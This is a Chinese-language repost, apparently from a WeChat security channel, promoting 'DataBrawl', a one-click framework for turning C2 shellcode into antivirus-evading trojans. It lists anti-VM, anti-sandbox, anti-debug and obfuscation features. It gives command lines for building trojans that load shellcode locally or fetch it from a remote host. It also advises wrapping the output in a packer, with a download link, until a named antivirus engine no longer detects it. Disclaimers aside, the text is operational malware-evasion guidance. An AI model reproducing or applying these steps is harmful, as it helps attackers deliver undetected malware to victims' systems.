项目介绍
DataBrawl是一款一键化生成免杀木马的shellcode免杀框架,具备本地加载方式和远程加载方式
工具特性
- 本地/分离加载
- ollvm混淆编译/gcc编译
- IAT obfuscate
- Anti-VM
- Anti-Sandbox(API Hammering,自定义sleep)
- Anti-Debug
- 内存加密
- add resource/sign
项目使用
帮助信息:
python dataBrawl.py -h
(1)本地加载shellcode:
CS或其他C2生成shellcode
-i 指复制目标exe的资源、图标和签名信息
python dataBrawl.py D:DevdataBrawlpayload_x64.bin -b 1 -t stdtemp -i "C:Usersxxx"
默认在项目跟目录生成result.exe,也可-o指定输出位置
这里是使用gcc编译,目前qvm未报毒,ollvm编译把-b选项输入2,目前qvm存在问题,可以再加个壳,我这里使用enigma protector ,自己大概选择配置下,qvm都无法拦截。https://down.52pojie.cn/Tools/Packers/The_Enigma_Protector_v7.40_x32_x64.rar
不过qvm比较玄学,可能过两天就报毒了,可以直接ollvm编译+壳。
使用ollvm加壳后如果还杀,就改一下加壳的选项。
(2) 远程加载shellcode
首先生成加密shellcode
python dataBrawl.py D:DevdataBrawlpayload_x64.bin -c 1 -t remote
使用远程模板生成木马
python dataBrawl.py http://www.xxx.com/shellcode.bin -b 1 -t remote -i "C:Usersxxx"
免责声明
该开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。作者不对您使用该工具所产生的任何后果负任何法律责任
下载地址
原文始发于微信公众号(七芒星实验室):【神兵利器】红队Shellcode免杀框架
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论